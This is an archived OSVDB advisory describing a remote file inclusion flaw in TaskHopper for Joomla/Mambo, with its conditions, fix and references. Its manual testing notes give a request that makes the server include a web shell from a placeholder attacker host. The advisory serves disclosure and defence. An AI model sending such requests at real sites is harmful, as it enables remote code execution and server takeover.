TaskHopper for Joomla/Mambo inc/timelog_type.php mosConfig_absolute_path Variable Remote File Inclusion

2007-04-10T17:32:50
ID OSVDB:34800
Type osvdb
Reporter Cold z3ro(Cold-z3ro@hotmail.com)
Modified 2007-04-10T17:32:50

Description

Vulnerability Description

TaskHopper for Joomla/Mambo contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'inc/timelog_type.php' script not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Upgrade to version 1.1 (2007-04-15) or higher, as it has been reported to fix this vulnerability. Note that this flaw was fixed in the 2007-04-15 release without a change in version number. An upgrade is required as there are no known workarounds.

Short Description

TaskHopper for Joomla/Mambo contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'inc/timelog_type.php' script not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://[attacker]/r57.txt?

References:

Vendor URL: http://taskhopper.com/ Vendor Specific Advisory URL Related OSVDB ID: 34799 Related OSVDB ID: 34801 Related OSVDB ID: 34795 Related OSVDB ID: 34797 Related OSVDB ID: 34798 Related OSVDB ID: 34796 Nessus Plugin ID:22049 Mail List Post: http://attrition.org/pipermail/vim/2007-April/001504.html ISS X-Force ID: 33552 Generic Exploit URL: http://www.milw0rm.com/exploits/3703 FrSIRT Advisory: ADV-2007-1346 CVE-2007-2005 Bugtraq ID: 23408